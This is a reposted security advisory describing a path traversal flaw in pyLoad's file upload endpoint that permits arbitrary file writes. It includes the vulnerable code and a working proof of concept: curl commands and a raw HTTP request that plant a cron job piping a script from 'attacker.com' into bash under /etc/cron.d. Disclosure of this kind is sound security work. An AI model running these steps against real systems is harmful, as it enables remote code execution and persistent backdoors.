pyLoad has Path Traversal Vulnerability in json/upload Endpoint that allows Arbitrary File Write

链接: https://github.com/advisories/GHSA-xqpg-92fq-grfg

仓库 Star: 3540

CVSS 评分: 7.5

参考链接:

描述:

Summary

An authenticated path traversal vulnerability exists in the /json/upload endpoint of the pyLoad By manipulating the filename of an uploaded file, an attacker can traverse out of the intended upload directory, allowing them to write arbitrary files to any location on the system accessible to the pyLoad process. This may lead to:

  • Remote Code Execution (RCE)
  • Local Privilege Escalation
  • System-wide compromise
  • Persistence and backdoors

Vulnerable Code

File: src/pyload/webui/app/blueprints/json_blueprint.py

1
2
3
4
5
6
@json_blueprint.route("/upload", methods=["POST"])
def upload():
    dir_path = api.get_config_value("general", "storage_folder")
    for file in request.files.getlist("file"):
        file_path = os.path.join(dir_path, "tmp_" + file.filename)  
        file.save(file_path)

Issue: No sanitization or validation on file.filename, allowing traversal via ../../ sequences.

(Proof of Concept)

  1. Clone and install pyLoad from source (pip install pyload-ng):
1
2
3
4
5
git clone https://github.com/pyload/pyload
cd pyload
git checkout 0.4.20
python -m pip install -e .
pyload --userdir=/tmp/pyload
  1. Or install via pip (PyPi) in virtualenv:
1
2
3
4
python -m venv pyload-env
source pyload-env/bin/activate
pip install pyload==0.4.20
pyload
  1. Login and obtain session token
1
2
curl -c cookies.txt -X POST http://127.0.0.1:8000/login \
  -d "username=admin&password=admin"
  1. Create malicious cron payload
1
echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit
  1. Upload file with path traversal filename
1
2
curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \
  -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor"
  1. On the next cron tick, a reverse shell or payload will be triggered.

BurpSuite HTTP Request

1
2
3
4
5
6
7
8
9
10
11
POST /json/upload HTTP/1.1
Host: 127.0.0.1:8000
Cookie: session=SESSION_ID_HERE
Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e

--------------------------d74496d66958873e
Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor"
Content-Type: application/octet-stream

*/1 * * * * root curl http://attacker.com/payload.sh | bash
--------------------------d74496d66958873e--
安全公告
#Github Advisory
pyLoad has Path Traversal Vulnerability in json/upload Endpoint that allows Arbitrary File Write
http://example.com/2025/07/21/github_3957047836/
作者
lianccc
发布于
2025年7月21日
许可协议